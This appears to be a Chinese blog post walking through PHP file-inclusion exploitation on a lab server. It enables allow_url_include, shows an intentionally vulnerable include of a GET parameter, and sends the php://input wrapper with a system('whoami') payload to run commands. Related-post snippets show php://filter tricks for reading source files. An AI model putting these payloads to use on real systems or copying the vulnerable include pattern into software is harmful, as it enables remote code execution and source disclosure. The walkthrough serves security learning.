php文件报告 php内置协议 访问cmd执行系统命令

最新推荐文章于 2022-07-25 14:52:10 发布
最新推荐文章于 2022-07-25 14:52:10 发布
阅读量608 收藏
点赞数
分类专栏: php渗透 php内置协议 文章标签: php文件包含 php渗透测试 php内置协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kali_linux/article/details/50472415
版权

这个漏洞需要有前提条件的  需要修改php.ini  一个参数才可以执行漏洞 

修改allow_url_include = On  这样在配合php文件包含 php内置协议 就可以执行漏洞了 


修改完成 重启apache  接着查看我们服务器php文件源代码


万年不变源代码

<?php
if ($_GET['func']) {
   include $_GET['func'];
} else {
   include 'default.php';
}
?>

使用浏览器打开网站

http://192.168.1.106/test_php_local/index.php?func=php:\\input



报错 到这里还不能确定有没有php内置协议漏洞  接着往下看   

下面我有用burp抓取数据包


看到没有  使用burp 没有返回信息  说明可能有这个漏洞

直接上命令

<?php system("whoami"); ?>



ok系统命令执行了   存在漏洞


kali_linux
关注
专栏目录
php内置协议直接读取代码及preg_replace()任意php执行漏洞
asd5201300的博客
02-17 494
尝试读取index.php的页面源码,通过php内置协议直接读取代码 ?page=php://filter/read=convert.base64-encode/resource=index.php
PHP内置协议(支持的协议和封装协议)
weixin_44257023的博客
06-18 333
PHP内置协议(支持的协议和封装协议)
PHP协议实现命令执行
Huamang的博客
12-01 311
PHP协议实现命令执行 转载于https://www.freebuf.com/column/148886.html 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file,计划对文件包含漏洞与php封装协议的利用方法进行总结,本篇先总结下一些封装协议,涉及的相关协议:file://、php://filter、p
PHP协议(封装协议/内置协议
m0_52923241的博客
07-23 1561
PHP内置协议/封装协议/伪协议 PHP带有很多内置URL风格的封装协议,这类协议与fopen()、copy()、file_exists()、filesize()等文件系统函数所提供的功能类似;可结合文件包含进行漏洞利用 PHP封装协议: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397)
【CTF题】使用文件包含漏洞读取网页代码
热门推荐
keysking瞎写东西的地方
01-25 2万+
【CTF题】使用文件包含漏洞读取网页代码按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。1.直接包含内有运行代码的文件比如有一index.php<?php include $_GET['file']; ?>那么就可以通过抓包修改file值的办法去运行一些本来不该运行
PHP启动windows应用程序、执行bat批处理、执行cmd命令的方法(exec、system函数详解)
10-25
这些函数能够执行命令行指令,如启动Windows应用程序、执行批处理文件(bat)或者执行cmd命令。 exec函数是PHP中的一个内置函数,它可以用来执行外部程序,并且可以获取执行的输出结果。exec函数的基本语法是exec...
php执行系统命令的方法
10-24
PHP中,有时候我们需要执行一些操作系统级别的命令,比如文件操作、系统查询等。这些操作可以通过PHP内置的一些函数来实现。本文将详细讲解如何在PHP执行系统命令,重点讨论`escapeshellcmd`和`exec`这两个函数...
PHP调用Linux命令权限不足问题解决方法
10-24
这通常发生在尝试使用PHP内置的`exec()`函数或者其它如`shell_exec()`等函数来执行系统命令时。 本文主要讲解了在使用CentOS 6.3系统环境下,遇到权限不足问题的解决方法。在这个场景中,开发者尝试执行一个名为`...
Shell脚本实现启动PHP内置FastCGI Server
09-15
在本文中,我们将深入探讨如何使用Shell脚本来启动PHP内置的FastCGI服务器,这是在没有php-fpm等专用进程管理器的情况下,为PHP提供FastCGI服务的一种方法。FastCGI是一种协议,用于在Web服务器(如Nginx)和动态...
PHP-TP命令行创建模块目录及文件
12-14
要通过命令行创建模块目录,你需要在项目的根目录下运行指定的命令。这里的"think"文件通常是指ThinkPHP的命令行工具。创建模块目录的命令格式如下: ```shell php think build --module 模块名 ``` 例如,如果你...
PHP内置封装协议php://filter
xuchen16的博客
09-19 1710
转载自:https://www.cnblogs.com/likai/archive/2010/01/29/1659336.html PHP内置封装协议php://filter php://filter 是一种设计用来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的文件函数例如 readfile(),file() 和 file_get_contents() 很有用,否则就没有机...
php协议实现命令执行的七种姿势
大方子
09-06 1615
文件包含函数:include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file 。 首先归纳下常见的文件包含函数:include、require、include_once、require_once、highlight_file 、show_...
VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议
大方子
10-04 989
项目地址:https://github.com/jianmou/VulnCTF ============================ 个人收获: 1.利用PHP内置协议直接读取网页代码   ==============================     题目:   我们查看下网页源码 通过代码发现是文件包含。   我们把url改为http://local...
PHP协议】源码读取、文件读写、任意php命令执行
07-25 3123
PHP协议
php协议
Ni9htMar3的博客
04-09 2万+
php协议 php:// php://filter
php协议任意文件读取
weixin_33763244的博客
06-11 1303
php://filter/read=convert.base64-encode/resource=index.php 转载于:https://www.cnblogs.com/iAmSoScArEd/p/10575939.html
切换到kali linux的第一篇记录备份
buffay2014的博客
11-02 1862
选择kali的理由: 安全人员!渗透测试所需。 debian稳定分支软件太旧,不稳定分支又不够成熟放心。 ubuntu虽好,官方却不支持gnome,unity太丑而又非主流。 首先要解决三个问题:驱动,输入法,翻墙设置。 首先编辑软件源 deb http://security.kali.org/ kali/updates main contrib non-free deb
PHP文件包含漏洞总结
dxm2025的专栏
11-13 696
0x00 前言 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 我们来看下面一段index.php代码: if ($_GET['func']) { include $_GET['fu
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值